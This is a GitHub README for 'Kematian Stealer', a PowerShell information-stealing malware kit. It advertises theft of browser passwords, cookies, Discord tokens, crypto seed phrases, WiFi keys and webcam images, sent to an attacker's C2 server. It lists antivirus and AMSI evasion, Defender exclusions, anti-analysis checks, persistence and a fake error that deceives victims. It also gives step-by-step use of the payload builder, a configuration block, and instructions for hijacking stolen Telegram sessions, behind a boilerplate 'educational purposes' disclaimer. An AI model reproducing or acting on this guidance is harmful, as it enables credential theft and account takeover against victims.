Skip to content

yexn1/Kematian-Stealer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

2 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Kematian Stealer

About The Project

Kematian Stealer is a PowerShell-based tool designed to effortlessly infiltrate and exfiltrate data from Windows systems. All information collected is transmitted via TCP to your C2 server, where everything is decrypted. It functions seamlessly across any x64bit system, from Windows 10 or later, ensuring compatibility with the latest updates. With Kematian Stealer, you can retrieve seed phrases, session files, passwords, application data, Discord tokens and more.

This tool is particularly advantageous for accessing application and file data without restrictions, while evading conventional security measures such as firewalls and antivirus software, thanks to its fileless capabilities, which set it apart from other stealers. Upon execution, Kematian Stealer creates a mutex on the system and designates the process as critical before initiating data exfiltration, ensuring smooth and uninterrupted transmission of data.

Moreover, the tool has robust persistence mechanisms to remain active on the machine after reboot. Additionally, its user-friendly web-based GUI builder simplifies the process of creating payloads, enhancing its accessibility and usability.

Usage

  • Download Files.
  • Use builder.bat
  • The builder will automatically generate your private key and certificate at first run, you can find them here $env:appdata\Kematian-Stealer
  • After opening the builder, it will also start a local server which will run on https://127.0.0.1:8080 by default.
  • Open your web browser and go to https://127.0.0.1:8080/builder
  • Input your C2 server in the TCP TUNNEL URL:PORT section
  • Next, activate the checkboxes for the features you want to include in the stub.
  • Finally hit build and the output stub will be placed in the same folder with the builder
  • Your logs will be saved here : $env:appdata\Kematian-Stealer\logs
  • A more detailed guide can be found here : https://devs.sped.lol/kematian-stealer

Note

THE DEBUG OPTION IS FOR TESTING PURPOSES ONLY

Configurations

$c2_server = "YOUR_URL_HERE_SERVER" 
$debug = $false
$blockhostsfile = $false
$criticalprocess = $false
$melt = $false
$fakeerror = $false
$persistence = $false
$write_disk_only = $false
$vm_protect = $false
$encryption_key = "YOUR_ENC_KEY_HERE"

Requirements

  • To build Kematian, you need:
  • Windows 10 or higher x64.
  • Powershell v5.0 or higher.
  • An active internet connection.

Obfuscation

Screenshots

πŸ”¨ Builder

builder

Builder Features

  • πŸ”Έ Obfuscation of BAT and PS1 files
  • πŸ”© Compilation of Exe Files
  • πŸ’‰ Pump/Inject the output exe file with zero-filled bytes

Features

  • GUI Builder
  • Anti-Kill (Terminating Kematian will result in a system crash, indicated by a BSoD blue screen of death).
  • Mutex (single instance)
  • Force UAC
  • Antivirus Evasion: Bypass AMSI, disables ETW and excluded from Windows Defender
  • Block Hosts File
  • Anti-Analysis VMWare, VirtualBox, Sandboxes, Emulators, Debuggers, Virustotal, Any.run
  • Persistence via Task Scheduler
  • Extracts WiFi Passwords
  • Files Stealer 2fa codes, seedphrases, passwords, privatekeys, etc.
  • πŸ“· Webcam & Desktop Screenshots
  • Session Stealers
  • Browsers Gecko Browsers and Chromium Browsers
    • πŸ”‘ Passwords
    • πŸͺ Cookies
    • πŸ“œ History
  • Extracts Discord tokens from Discord applications, Chromium browsers and Gecko browsers.
  • Get System Information (Version, CPU, DISK, GPU, RAM, IP, Installed Apps etc.)
  • Fake Error: Tricks the user into thinking that the program closed due to an error.
  • List of Installed Antiviruses
  • List of all Network Adapters
  • List of Apps that Run On Startup
  • List of Running Services & Applications
  • Extracts Product Key
  • Self-Destructs After Execution (optional)

Telegram Session Stealer Usage :

After the exfiltrated data is uploaded to your C2 server, download the zip file and extract it on your PC, inside that folder there will also be another subfolder Messaging Sessions , inside this subfolder you will find the Telegram folder. Now, copy the tdata folder from Telegram folder and paste it in the directory below:

%userprofile%\AppData\Roaming\Telegram Desktop

Before pasting the tdata folder, ensure that you have deleted or backup the existing tdata folder on your PC. DOWNLOAD

Note

The other session stealers can be utilized by applying the technique above

πŸ—‘ Uninstaller (Removes the Scheduled Task, Script Folder, ExclusionPaths and Resets Hosts File)

  • Open a new Elevated Powershell Console then copy & paste the contents below
$ErrorActionPreference = "SilentlyContinue"
function Cleanup {
  Unregister-ScheduledTask -TaskName "Kematian" -Confirm:$False
  Remove-Item -Path "$env:appdata\Kematian" -force -recurse
  Remove-MpPreference -ExclusionPath "$env:APPDATA\Kematian"
  Remove-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp"
$resethostsfile = @'
# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
# localhost name resolution is handle within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
'@
  [IO.File]::WriteAllText("$env:windir\System32\Drivers\etc\hosts", $resethostsfile)
  Write-Host "[~] Successfully Uninstalled Kematian !" -ForegroundColor Green
}
Cleanup

Need Help?

Bug Reports and Suggestions

Found a bug? Have an idea? Let me know here, Please provide a detailed explanation of the expected behavior, actual behavior, and steps to reproduce, or what you want to see and how it could be done. You can be a small part of this project!

License

This project is licensed under the MIT License - see the LICENSE file for details

Disclaimer

I, the creator, am not responsible for any actions, and or damages, caused by this software. You bear the full responsibility of your actions and acknowledge that this tool was created for educational purposes only. This tool's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use. By using this software, you automatically agree to the above.

Credits

Back to Top